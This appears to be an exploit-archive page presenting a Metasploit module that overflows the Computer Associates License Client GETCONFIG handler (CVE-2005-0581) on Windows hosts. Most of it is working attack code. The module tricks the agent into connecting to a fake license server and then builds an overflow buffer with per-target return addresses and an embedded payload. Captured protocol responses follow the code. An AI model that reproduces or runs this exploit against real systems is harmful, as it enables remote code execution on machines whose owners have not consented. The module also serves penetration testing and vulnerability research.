what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Computer Associates License Client GETCONFIG Overflow

Computer Associates License Client GETCONFIG Overflow
Posted Feb 15, 2010
Authored by patrick, Thor Doomen | Site metasploit.com

This Metasploit module exploits an vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.

tags | exploit, local, udp
systems | windows
advisories | CVE-2005-0581
SHA-256 | d3f07719ead763dc46245786376f69700d88d42ed26c7accf58521d0730e72de

Computer Associates License Client GETCONFIG Overflow

Change Mirror Download
##
# $Id: calicclnt_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Computer Associates License Client GETCONFIG Overflow',
'Description' => %q{
This module exploits an vulnerability in the CA License Client
service. This exploit will only work if your IP address can be
resolved from the target system point of view. This can be
accomplished on a local network by running the 'nmbd' service
that comes with Samba. If you are running this exploit from
Windows and do not filter udp port 137, this should not be a
problem (if the target is on the same network segment). Due to
the bugginess of the software, you are only allowed one connection
to the agent port before it starts ignoring you. If it wasn't for this
issue, it would be possible to repeatedly exploit this bug.
},
'Author' => [
'Thor Doomen <syscall [at] hushmail.com>', # original msf v2 module
'patrick', # msf v3 port :)
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8478 $',
'References' =>
[
[ 'CVE', '2005-0581' ],
[ 'OSVDB', '14389' ],
[ 'BID', '12705' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x20",
'StackAdjustment' => -3500,

},
'Platform' => 'win',
'Targets' =>
[
# As much as I would like to return back to the DLL or EXE,
# all of those modules have a leading NULL in the
# loaded @ address :(
# name, jmp esi, writable, jmp edi
#['Automatic', {} ],
#
# patrickw - tested OK Windows XP English SP0-1 only 20100214
['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
],
'DisclosureDate' => 'Mar 02 2005'))

register_options(
[
Opt::RPORT(10203),
OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]),
], self.class)
end

#def check
# It is possible to check, but due to a software bug, checking prevents exploitation
#end

def exploit
if (connect)
sock.put("A0 GETSERVER<EOM>\n")
print_status("Initial packet sent to remote agent...")
disconnect

fakecaservice = Rex::Socket::TcpServer.create(
'LocalHost' => '0.0.0.0',
'LocalPort' => datastore['SRVPORT'],
'SSL' => false,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})

fakecaservice.start
print_status("Waiting for the license agent to connect back...")
begin
Timeout.timeout(3) do
done = false
while (not done and session = fakecaservice.accept)
print_status("Accepted connection from agent #{Rex::Socket.source_address(rhost)}..")
session.put("A0 GETCONFIG SELF 0<EOM>")
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?

if (req =~ /OS\<([^\>]+)/)
print_status("Target reports OS: #{$1}")
end

# exploits two different versions at once >:-)
# 144 -> return address of esi points to string middle
# 196 -> return address of edi points to string beginning
# 148 -> avoid exception by patching with writable address
# 928 -> seh handler (not useful under XP SP2)
buff = rand_text_alphanumeric(900)
buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses
buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi
buff[148, 4] = [target['Rets'][1]].pack('V') # writable address
buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address
buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi
buff[272, payload.encoded.length] = payload.encoded

sploit = "A0 GETCONFIG SELF #{buff}<EOM>"
session.put(sploit)
session.close
end
end
ensure
handler
fakecaservice.close
return
end
end
end

end

=begin
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>
=end

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close